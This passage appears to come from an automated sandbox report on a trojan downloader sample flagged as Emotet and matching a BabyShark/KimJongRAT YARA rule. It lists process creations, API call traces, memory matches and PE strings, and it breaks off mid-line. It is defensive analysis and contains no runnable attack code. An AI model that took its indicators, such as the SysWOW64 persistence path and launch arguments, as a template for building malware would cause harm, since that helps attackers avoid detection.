              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0040C36D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_0040C36D
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_00414678 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_00414678
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_00448AF9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,1_2_00448AF9

              E-Banking Fraud:

              Emotet Banking Trojan found
              Source: unknown | Process created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp'
              Source: unknown | Process created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\85F1.tmp'
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Process created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp'
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Process created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\85F1.tmp'
              Yara detected Emotet
              Source: Yara match | File source: 00000001.00000002.534389058.0000000002230000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.273734251.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.537497856.0000000003A90000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.364995711.00000000037DC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.365206354.0000000003879000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.537572294.0000000003C40000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.361338829.0000000002649000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.273743388.00000000022C1000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.535381631.0000000003240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.534410490.0000000002241000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 1.2.PlayToStatusProvider.exe.3a90000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 1.2.PlayToStatusProvider.exe.3c40000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 1.2.PlayToStatusProvider.exe.3240000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 1.2.PlayToStatusProvider.exe.3a90000.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 1.2.PlayToStatusProvider.exe.3c40000.8.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 1.2.PlayToStatusProvider.exe.3240000.4.raw.unpack, type: UNPACKEDPE

              System Summary:

              Malicious sample detected (through community Yara rule)Show sources
              Source: 0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 00000001.00000003.372994628.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 0000000E.00000002.370666116.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.1.PlayToStatusProvider.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 1.3.PlayToStatusProvider.exe.3510000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.2.PlayToStatusProvider.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 1.3.PlayToStatusProvider.exe.3510000.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.2.PlayToStatusProvider.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: 14.1.PlayToStatusProvider.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,13_2_0040A5A9
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040A5A9 CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,DuplicateHandle,FindCloseChangeNotification,FindCloseChangeNotification,13_1_0040A5A9
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeFile created: C:\Windows\SysWOW64\mmc\Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeFile deleted: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe:Zone.IdentifierJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0041608F0_2_0041608F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044C2A90_2_0044C2A9
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045C34F0_2_0045C34F
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044C77C0_2_0044C77C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045C8910_2_0045C891
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004528A00_2_004528A0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044CB500_2_0044CB50
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045CDD30_2_0045CDD3
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044CF5C0_2_0044CF5C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045F36A0_2_0045F36A
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044D37C0_2_0044D37C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0044944C0_2_0044944C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004574C20_2_004574C2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004594820_2_00459482
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0045D4970_2_0045D497
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004036C00_2_004036C0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_00409AF00_2_00409AF0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0041608F1_2_0041608F
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044C2A91_2_0044C2A9
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045C34F1_2_0045C34F
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044C77C1_2_0044C77C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045C8911_2_0045C891
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_004528A01_2_004528A0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044CB501_2_0044CB50
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045CDD31_2_0045CDD3
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044CF5C1_2_0044CF5C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045F36A1_2_0045F36A
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044D37C1_2_0044D37C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0044944C1_2_0044944C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_004574C21_2_004574C2
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_004594821_2_00459482
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0045D4971_2_0045D497
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_004038A512_2_004038A5
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040947012_2_00409470
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040123E12_2_0040123E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_004010B412_2_004010B4
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040C0BC12_2_0040C0BC
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_00409F5412_2_00409F54
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040832512_2_00408325
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_004099E212_2_004099E2
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_2_0040B1F712_2_0040B1F7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_004038A512_1_004038A5
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040947012_1_00409470
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040123E12_1_0040123E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_004010B412_1_004010B4
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040C0BC12_1_0040C0BC
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_00409F5412_1_00409F54
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040832512_1_00408325
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_004099E212_1_004099E2
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 12_1_0040B1F712_1_0040B1F7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_004360CE13_2_004360CE
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040509C13_2_0040509C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040519913_2_00405199
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0043C2D013_2_0043C2D0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00440406
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_0040451D
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_004045FF
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_0040458E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00404690
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00414A51
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00404C08
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00406C8E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00415DF3
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00416E5C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_00410FE4
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_0040509C
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_00405199
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_0043C2D0
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_00440406
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_0040451D
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_004045FF
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_0040458E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_00404690
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_00414A51
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_00404C08
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_00406C8E
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 14_2_00404DE5
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 14_2_00404E56
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 14_2_00404EC7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 14_2_00404F58
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 14_2_0040BF6B
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 0044BCF4 appears 70 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 00401DD0 appears 74 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 0041AB37 appears 48 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 0044BE4C appears 55 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 0044A596 appears 55 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 0042D14D appears 42 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 0044BCC1 appears 252 times
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: String function: 00411990 appears 41 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 0044BCF4 appears 57 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 00401DD0 appears 74 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 0041AB37 appears 42 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 004053C5 appears 34 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 0040924D appears 31 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 004166E8 appears 34 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 0042D14D appears 42 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 00416A91 appears 88 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 0044BCC1 appears 192 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 00411990 appears 32 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 00404880 appears 42 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 00445190 appears 69 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 00416849 appears 66 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 00412084 appears 39 times
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: String function: 0044BE4C appears 49 times
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PlayToStatusProvideroe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PlayToStatusProvideroe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PlayToStatusProvideroe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000002.273828829.0000000002450000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000002.273828829.0000000002450000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000000.268247553.000000000048F000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCodezBank.exeJ vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe, 00000000.00000002.273780766.00000000023F0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Binary or memory string: OriginalFilenameCodezBank.exeJ vs SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe
              Source: 0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000001.00000003.372994628.0000000003510000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0000000E.00000002.370666116.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 14.1.PlayToStatusProvider.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 1.3.PlayToStatusProvider.exe.3510000.2.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, refere